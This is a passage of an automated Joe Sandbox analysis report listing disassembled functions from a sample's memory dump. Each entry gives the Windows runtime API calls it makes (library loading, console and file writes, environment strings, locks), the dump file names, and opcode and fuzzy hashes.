                                                                                                                                                                                            • Instruction ID: a0df219aeeb993f6458ef157a567a0aa0d1464b110ed5773d929e3ff4d0995a2
                                                                                                                                                                                            • Opcode Fuzzy Hash: 1b5d1bb02c481d616cbf3a8f7bd76ff227b8ffd1e1d3881294704ecccd3dcd32
                                                                                                                                                                                            • Instruction Fuzzy Hash: D4017CB9A056309BCB09EF60E855A7C7761FFC6350B158109E91257389CF386E02EB91
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00937F2E,00000000,?,00946E10,?,?,?,00937E65,00000004,InitializeCriticalSectionEx,0093E57C,0093E584), ref: 00937E9F
                                                                                                                                                                                            • GetLastError.KERNEL32(?,00937F2E,00000000,?,00946E10,?,?,?,00937E65,00000004,InitializeCriticalSectionEx,0093E57C,0093E584,00000000,?,0092E1DC), ref: 00937EA9
                                                                                                                                                                                            • LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 00937ED1
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 0000000A.00000002.2143453431.0000000000921000.00000020.00000001.01000000.00000009.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                            • Associated: 0000000A.00000002.2143427973.0000000000920000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 0000000A.00000002.2143497451.000000000093C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 0000000A.00000002.2143554074.0000000000945000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 0000000A.00000002.2143573511.0000000000948000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 0000000A.00000002.2143594655.000000000094A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 0000000A.00000002.2143625595.000000000094D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_920000_d2cb36d600.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: LibraryLoad$ErrorLast
                                                                                                                                                                                            • String ID: api-ms-
                                                                                                                                                                                            • API String ID: 3177248105-2084034818
                                                                                                                                                                                            • Opcode ID: c6433c8fa71d438011a51bee66566098e3c405cb08c1daa6b5d8d41b89df0203
                                                                                                                                                                                            • Instruction ID: 1e3c9e5dfac5b6506ae3f89e3a3ddff7f2cd8349cb83b460f220048cf35d74f2
                                                                                                                                                                                            • Opcode Fuzzy Hash: c6433c8fa71d438011a51bee66566098e3c405cb08c1daa6b5d8d41b89df0203
                                                                                                                                                                                            • Instruction Fuzzy Hash: BCE04F74298209BBEF301BB1EC06F597B5DDB51B94F208060F94DB88F1E7A19E50AEC5
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • GetConsoleOutputCP.KERNEL32(BB40E64E,00000000,00000000,?), ref: 00935690
                                                                                                                                                                                              • Part of subcall function 0092E641: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,0092FDE8,?,00000000,-00000008), ref: 0092E6A2
                                                                                                                                                                                            • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 009358E2
                                                                                                                                                                                            • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 00935928
                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 009359CB
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 0000000A.00000002.2143453431.0000000000921000.00000020.00000001.01000000.00000009.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                            • Associated: 0000000A.00000002.2143427973.0000000000920000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 0000000A.00000002.2143497451.000000000093C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 0000000A.00000002.2143554074.0000000000945000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 0000000A.00000002.2143573511.0000000000948000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 0000000A.00000002.2143594655.000000000094A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 0000000A.00000002.2143625595.000000000094D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_920000_d2cb36d600.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 2112829910-0
                                                                                                                                                                                            • Opcode ID: 8539104f75706ed18fdb5edf52d7291cecfbef5c27b6ba9a74703db3e2dcf55f
                                                                                                                                                                                            • Instruction ID: 4a4a88ffc334c9ef4e6600d78b6a0e7d83c529534d040ab05cf33d51aaf87d23
                                                                                                                                                                                            • Opcode Fuzzy Hash: 8539104f75706ed18fdb5edf52d7291cecfbef5c27b6ba9a74703db3e2dcf55f
                                                                                                                                                                                            • Instruction Fuzzy Hash: C5D198B5D04648DFCB05CFA8D880AAEBBF9FF4D310F29452AE856EB251D630A941CF50
                                                                                                                                                                                            APIs
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 0000000A.00000002.2143453431.0000000000921000.00000020.00000001.01000000.00000009.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                            • Associated: 0000000A.00000002.2143427973.0000000000920000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 0000000A.00000002.2143497451.000000000093C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 0000000A.00000002.2143554074.0000000000945000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 0000000A.00000002.2143573511.0000000000948000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 0000000A.00000002.2143594655.000000000094A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 0000000A.00000002.2143625595.000000000094D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_920000_d2cb36d600.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: AdjustPointer
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 1740715915-0
                                                                                                                                                                                            • Opcode ID: 21143368538983fc5cca214c0812f9f6d7891e5bf58359e3cd6b42b2d9f8b2da
                                                                                                                                                                                            • Instruction ID: d308938f53a6fb2d7f01704f3b3e42e653adc18a6531c64a95f7eb95a46a726f
                                                                                                                                                                                            • Opcode Fuzzy Hash: 21143368538983fc5cca214c0812f9f6d7891e5bf58359e3cd6b42b2d9f8b2da
                                                                                                                                                                                            • Instruction Fuzzy Hash: 5551257A607626AFDB289F10F841BBAB3B8EF44310F24442DF94157299E731ED80CB90
                                                                                                                                                                                            APIs
                                                                                                                                                                                              • Part of subcall function 0092E641: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,0092FDE8,?,00000000,-00000008), ref: 0092E6A2
                                                                                                                                                                                            • GetLastError.KERNEL32(00000000,?,?,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,00000000,00000000), ref: 0093359B
                                                                                                                                                                                            • __dosmaperr.LIBCMT ref: 009335A2
                                                                                                                                                                                            • GetLastError.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,00000000,00000000), ref: 009335DC
                                                                                                                                                                                            • __dosmaperr.LIBCMT ref: 009335E3
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 0000000A.00000002.2143453431.0000000000921000.00000020.00000001.01000000.00000009.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                            • Associated: 0000000A.00000002.2143427973.0000000000920000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 0000000A.00000002.2143497451.000000000093C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 0000000A.00000002.2143554074.0000000000945000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 0000000A.00000002.2143573511.0000000000948000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 0000000A.00000002.2143594655.000000000094A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 0000000A.00000002.2143625595.000000000094D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_920000_d2cb36d600.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: ErrorLast__dosmaperr$ByteCharMultiWide
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 1913693674-0
                                                                                                                                                                                            • Opcode ID: c0727cb182d458267718fda70e8e4459c22bacd8f7e9081fd1a0adab184d40d6
                                                                                                                                                                                            • Instruction ID: b7bb01b1f92222e20fc535298aae9a995ae88b02a62cc322822219dcd368e3d2
                                                                                                                                                                                            • Opcode Fuzzy Hash: c0727cb182d458267718fda70e8e4459c22bacd8f7e9081fd1a0adab184d40d6
                                                                                                                                                                                            • Instruction Fuzzy Hash: 8421A471640715EFDB20AF66A88196BBBACFF40364B10C519F82997651EB30EF508FA1
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 0000000A.00000002.2143453431.0000000000921000.00000020.00000001.01000000.00000009.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                            • Associated: 0000000A.00000002.2143427973.0000000000920000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 0000000A.00000002.2143497451.000000000093C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 0000000A.00000002.2143554074.0000000000945000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 0000000A.00000002.2143573511.0000000000948000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 0000000A.00000002.2143594655.000000000094A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 0000000A.00000002.2143625595.000000000094D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_920000_d2cb36d600.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: 247a612ea4be01b02d248802476af834ac7bbfd7b19dac02522c3ad7b25eaf12
                                                                                                                                                                                            • Instruction ID: 64df9d874cb93d6b14c0739205b771bb29e536089473430c8a5f4bf5773e3f01
                                                                                                                                                                                            • Opcode Fuzzy Hash: 247a612ea4be01b02d248802476af834ac7bbfd7b19dac02522c3ad7b25eaf12
                                                                                                                                                                                            • Instruction Fuzzy Hash: D921C63121A225AFDB20AF71FC80EABB76DAF903647104525F81597599DF31EC1087A1
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • GetEnvironmentStringsW.KERNEL32 ref: 00934857
                                                                                                                                                                                              • Part of subcall function 0092E641: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,0092FDE8,?,00000000,-00000008), ref: 0092E6A2
                                                                                                                                                                                            • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0093488F
                                                                                                                                                                                            • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 009348AF
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 0000000A.00000002.2143453431.0000000000921000.00000020.00000001.01000000.00000009.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                            • Associated: 0000000A.00000002.2143427973.0000000000920000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 0000000A.00000002.2143497451.000000000093C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 0000000A.00000002.2143554074.0000000000945000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 0000000A.00000002.2143573511.0000000000948000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 0000000A.00000002.2143594655.000000000094A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 0000000A.00000002.2143625595.000000000094D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_920000_d2cb36d600.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: EnvironmentStrings$Free$ByteCharMultiWide
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 158306478-0
                                                                                                                                                                                            • Opcode ID: d4beb3cb5d364de64b5c8766776b7d382dd2865e3d9676c31356490c33591c40
                                                                                                                                                                                            • Instruction ID: 8d521ee3dbc505df2efe7383685837501961828c44cdadfe960e09f2d359d386
                                                                                                                                                                                            • Opcode Fuzzy Hash: d4beb3cb5d364de64b5c8766776b7d382dd2865e3d9676c31356490c33591c40
                                                                                                                                                                                            • Instruction Fuzzy Hash: B41104B5516265BF6A1127B5ACCDD6F395CDF86394B110434F401A1100FA64EE419A70
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • __EH_prolog3.LIBCMT ref: 00924582
                                                                                                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 0092458C
                                                                                                                                                                                              • Part of subcall function 009224C2: std::_Lockit::_Lockit.LIBCPMT ref: 009224DE
                                                                                                                                                                                              • Part of subcall function 009224C2: std::_Lockit::~_Lockit.LIBCPMT ref: 009224F7
                                                                                                                                                                                            • codecvt.LIBCPMT ref: 009245C6
                                                                                                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 009245FD
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 0000000A.00000002.2143453431.0000000000921000.00000020.00000001.01000000.00000009.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                            • Associated: 0000000A.00000002.2143427973.0000000000920000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 0000000A.00000002.2143497451.000000000093C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 0000000A.00000002.2143554074.0000000000945000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 0000000A.00000002.2143573511.0000000000948000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 0000000A.00000002.2143594655.000000000094A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 0000000A.00000002.2143625595.000000000094D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_920000_d2cb36d600.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: Lockitstd::_$Lockit::_Lockit::~_$H_prolog3codecvt
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 3716348337-0
                                                                                                                                                                                            • Opcode ID: 11b6befb29e4b9b976e3368b7310fb9e4e88706c8aa73c8bcd5c9ba9fedaf3bf
                                                                                                                                                                                            • Instruction ID: 4021d49be53903054a4e7e7888d6d06e61e03943949b9a98c9a3760e508130ee
                                                                                                                                                                                            • Opcode Fuzzy Hash: 11b6befb29e4b9b976e3368b7310fb9e4e88706c8aa73c8bcd5c9ba9fedaf3bf
                                                                                                                                                                                            • Instruction Fuzzy Hash: D001C0759002359BCB04EBA4F816BAD77B5BF91310F254508F412A72D9CF749E019B92
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • WriteConsoleW.KERNEL32(00000000,?,00000000,00000000,00000000,?,00939B0F,00000000,00000001,00000000,?,?,00935A1F,?,00000000,00000000), ref: 0093A4F7
                                                                                                                                                                                            • GetLastError.KERNEL32(?,00939B0F,00000000,00000001,00000000,?,?,00935A1F,?,00000000,00000000,?,?,?,00935365,00000000), ref: 0093A503
                                                                                                                                                                                              • Part of subcall function 0093A554: CloseHandle.KERNEL32(FFFFFFFE,0093A513,?,00939B0F,00000000,00000001,00000000,?,?,00935A1F,?,00000000,00000000,?,?), ref: 0093A564
                                                                                                                                                                                            • ___initconout.LIBCMT ref: 0093A513
                                                                                                                                                                                              • Part of subcall function 0093A535: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,0093A4D1,00939AFC,?,?,00935A1F,?,00000000,00000000,?), ref: 0093A548
                                                                                                                                                                                            • WriteConsoleW.KERNEL32(00000000,?,00000000,00000000,?,00939B0F,00000000,00000001,00000000,?,?,00935A1F,?,00000000,00000000,?), ref: 0093A528
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 0000000A.00000002.2143453431.0000000000921000.00000020.00000001.01000000.00000009.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                            • Associated: 0000000A.00000002.2143427973.0000000000920000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 0000000A.00000002.2143497451.000000000093C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 0000000A.00000002.2143554074.0000000000945000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 0000000A.00000002.2143573511.0000000000948000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 0000000A.00000002.2143594655.000000000094A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 0000000A.00000002.2143625595.000000000094D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_920000_d2cb36d600.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 2744216297-0
                                                                                                                                                                                            • Opcode ID: d5bca61ce078fd0675d17ad0f318cad6b31553f2f3fa2151c417fe9d72a68c02
                                                                                                                                                                                            • Instruction ID: 7ca2d307ae3d8a52b7a729d7f1ec138bba8a4c0db13d7b761634de32997fe618
                                                                                                                                                                                            • Opcode Fuzzy Hash: d5bca61ce078fd0675d17ad0f318cad6b31553f2f3fa2151c417fe9d72a68c02
                                                                                                                                                                                            • Instruction Fuzzy Hash: 57F0123A024115BFCF221FE5EC04E9E3F26FB86361F004110F99985120D6318920AB92
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • GetSystemTimeAsFileTime.KERNEL32(?), ref: 009259B9
                                                                                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 009259C8
                                                                                                                                                                                            • GetCurrentProcessId.KERNEL32 ref: 009259D1
                                                                                                                                                                                            • QueryPerformanceCounter.KERNEL32(?), ref: 009259DE
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 0000000A.00000002.2143453431.0000000000921000.00000020.00000001.01000000.00000009.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                            • Associated: 0000000A.00000002.2143427973.0000000000920000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 0000000A.00000002.2143497451.000000000093C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 0000000A.00000002.2143554074.0000000000945000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 0000000A.00000002.2143573511.0000000000948000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 0000000A.00000002.2143594655.000000000094A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 0000000A.00000002.2143625595.000000000094D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_920000_d2cb36d600.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 2933794660-0
                                                                                                                                                                                            • Opcode ID: 879ab4795e75f6c56d94cd81242a0c9ff23e56846a0b3b149d07235e943f38aa
                                                                                                                                                                                            • Instruction ID: 4886730dbf673f2ebc7ae6283655788d1d1e8947e367c31804faf95075205c81
                                                                                                                                                                                            • Opcode Fuzzy Hash: 879ab4795e75f6c56d94cd81242a0c9ff23e56846a0b3b149d07235e943f38aa
                                                                                                                                                                                            • Instruction Fuzzy Hash: 44F0B234D2520CEBCB00DBB4CA4998EFBF4FF1D200B918596A412E7210E730AB449F50
                                                                                                                                                                                            APIs
                                                                                                                                                                                              • Part of subcall function 0092E783: GetLastError.KERNEL32(00000000,?,00930AB9), ref: 0092E787
                                                                                                                                                                                              • Part of subcall function 0092E783: SetLastError.KERNEL32(00000000,?,?,00000028,0092B9D2), ref: 0092E829
                                                                                                                                                                                            • GetACP.KERNEL32(-00000002,00000000,?,00000000,00000000,?,00929266,?,?,?,00000055,?,-00000050,?,?,?), ref: 009321D6
                                                                                                                                                                                            • IsValidCodePage.KERNEL32(00000000,-00000002,00000000,?,00000000,00000000,?,00929266,?,?,?,00000055,?,-00000050,?,?), ref: 0093220D
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 0000000A.00000002.2143453431.0000000000921000.00000020.00000001.01000000.00000009.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                            • Associated: 0000000A.00000002.2143427973.0000000000920000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 0000000A.00000002.2143497451.000000000093C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 0000000A.00000002.2143554074.0000000000945000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 0000000A.00000002.2143573511.0000000000948000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 0000000A.00000002.2143594655.000000000094A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 0000000A.00000002.2143625595.000000000094D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_920000_d2cb36d600.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: ErrorLast$CodePageValid
                                                                                                                                                                                            • String ID: utf8
                                                                                                                                                                                            • API String ID: 943130320-905460609
                                                                                                                                                                                            • Opcode ID: 146e9b8c66dbef1040a1c051a37b0be87b53b10bb7cc4030f122010eb5235f3e
                                                                                                                                                                                            • Instruction ID: 5068f5150969df6dda1864f0b73a640d0904d6b834bd4372d991664e96eec696
                                                                                                                                                                                            • Opcode Fuzzy Hash: 146e9b8c66dbef1040a1c051a37b0be87b53b10bb7cc4030f122010eb5235f3e
                                                                                                                                                                                            • Instruction Fuzzy Hash: 7A510675644305AADB25BB74DC82FBB73ACEF85B00F144429FA16DB181FB74E9408EA1
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • EncodePointer.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,?,0092DEAD,?,?,00000000,00000000,00000000,?), ref: 0092DFD1
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 0000000A.00000002.2143453431.0000000000921000.00000020.00000001.01000000.00000009.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                            • Associated: 0000000A.00000002.2143427973.0000000000920000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 0000000A.00000002.2143497451.000000000093C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 0000000A.00000002.2143554074.0000000000945000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 0000000A.00000002.2143573511.0000000000948000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 0000000A.00000002.2143594655.000000000094A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 0000000A.00000002.2143625595.000000000094D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_920000_d2cb36d600.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: EncodePointer
                                                                                                                                                                                            • String ID: MOC$RCC
                                                                                                                                                                                            • API String ID: 2118026453-2084237596
                                                                                                                                                                                            • Opcode ID: 88d827fac53d6be14d18ef12ec9110b7f00d0c1a202ac450df47b833b8a0184e
                                                                                                                                                                                            • Instruction ID: 556c73608bb74a53f696bdc883448947454dcc53493f0c5e21b29cb210352e2d
                                                                                                                                                                                            • Opcode Fuzzy Hash: 88d827fac53d6be14d18ef12ec9110b7f00d0c1a202ac450df47b833b8a0184e
                                                                                                                                                                                            • Instruction Fuzzy Hash: 60417B31904219EFCF25DF94EC81AEEBBB9FF48304F188059F9046B219D3759951DB50
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • ___except_validate_context_record.LIBVCRUNTIME ref: 0092DA8F
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 0000000A.00000002.2143453431.0000000000921000.00000020.00000001.01000000.00000009.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                            • Associated: 0000000A.00000002.2143427973.0000000000920000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 0000000A.00000002.2143497451.000000000093C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 0000000A.00000002.2143554074.0000000000945000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 0000000A.00000002.2143573511.0000000000948000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 0000000A.00000002.2143594655.000000000094A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 0000000A.00000002.2143625595.000000000094D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_920000_d2cb36d600.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: ___except_validate_context_record
                                                                                                                                                                                            • String ID: csm$csm
                                                                                                                                                                                            • API String ID: 3493665558-3733052814
                                                                                                                                                                                            • Opcode ID: 1e9c1c30f166cbe713c8f09f01912c6fcfd41f5a3a3123914b841fcb4254750d
                                                                                                                                                                                            • Instruction ID: be53b2a235d093680086f9cab7538a443982a2aa9a54d9c27ad14ef133cf61f0
                                                                                                                                                                                            • Opcode Fuzzy Hash: 1e9c1c30f166cbe713c8f09f01912c6fcfd41f5a3a3123914b841fcb4254750d
                                                                                                                                                                                            • Instruction Fuzzy Hash: 02314832506238DFCF229F50EC50DAA7B69FF08364B198259FC448A225C332CDA1DBD1
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • AcquireSRWLockExclusive.KERNEL32(0094648C,ios_base::badbit set,?,?,00921C84,00946478,00921B17), ref: 009229DF
                                                                                                                                                                                            • ReleaseSRWLockExclusive.KERNEL32(0094648C,?,?,00921C84,00946478,00921B17), ref: 00922A19
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 0000000A.00000002.2143453431.0000000000921000.00000020.00000001.01000000.00000009.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                            • Associated: 0000000A.00000002.2143427973.0000000000920000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 0000000A.00000002.2143497451.000000000093C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 0000000A.00000002.2143554074.0000000000945000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 0000000A.00000002.2143573511.0000000000948000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 0000000A.00000002.2143594655.000000000094A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 0000000A.00000002.2143625595.000000000094D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_920000_d2cb36d600.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: ExclusiveLock$AcquireRelease
                                                                                                                                                                                            • String ID: ios_base::badbit set
                                                                                                                                                                                            • API String ID: 17069307-3882152299
